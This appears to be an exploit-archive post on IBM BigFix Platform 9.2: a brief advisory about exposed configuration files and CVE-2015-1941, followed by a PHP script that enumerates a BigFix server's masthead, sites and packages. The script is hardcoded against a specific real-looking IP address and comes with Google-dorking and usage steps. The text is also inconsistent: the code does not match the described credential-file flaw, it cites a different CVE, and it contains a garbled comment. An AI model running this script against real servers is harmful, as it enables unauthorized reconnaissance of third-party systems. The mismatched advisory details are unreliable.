IBM BigFix Platform 9.2 Information Disclosure

IBM BigFix Platform 9.2 was affected by an information disclosure IBM BigFix Platform 9.2 was affected by an information disclosure vulnerability. This flaw primarily impacted the Web Reports component, allowing unauthorized access to sensitive configuration files.

Specifically, files like `datasourcename.properties` were exposed. These files contained critical information such as database credentials and administrative passwords.

Such exposure could lead to unauthorized database access, privilege escalation, and further system compromise. The vulnerability is tracked as CVE-2015-1941.

IBM addressed this issue with a security patch. Users were advised to upgrade to patched versions or apply the provided fixes to mitigate the risk.

=============================================================================================================================================
| # Title : IBM BigFix Platform 9.2 gather information Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://bigfix.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL.

(linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),

[+] save code as poc.php.

[+] Set Target : line 68

[+] USage : php poc.php

[+] PayLoad :

<?php

class IBM_BigFix_Enum
{
private $targetUri;
private $port;
private $ssl;

public function __construct($targetUri, $port = 52311, $ssl = true)
{
$this->targetUri = rtrim($targetUri, '/');
$this->port = $port;
$this->ssl = $ssl;
}

private function sendRequest($uri)
{
$url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . ":$this->port" . '/' . ltrim($uri, '/');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function getMasthead()
{
$response = $this->sendRequest('masthead/masthead.axfm');
if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {
echo "Organization: " . htmlspecialchars($matches[1]) . "\n";
}
if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {
foreach ($matches[1] as $url) {
echo "URL: " . htmlspecialchars($url) . "\n";
}
}
}

public function getSites()
{
$response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');
if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {
echo "Sites:\n";
foreach ($matches[1] as $site) {
echo "- " . htmlspecialchars($site) . "\n";
}
}
}

public function getPackages()
{
$response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');
if (!$response) {
return;
}

echo "Packages:\n";
if (preg_match_all('/url: (.*)/', $response, $matches)) {
foreach ($matches[1] as $url) {
echo "- " . htmlspecialchars($url) . "\n";
}
}
}
}

// ????? ?????
$bigFix = new IBM_BigFix_Enum('153.143.185.78');
$bigFix->getMasthead();
$bigFix->getSites();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================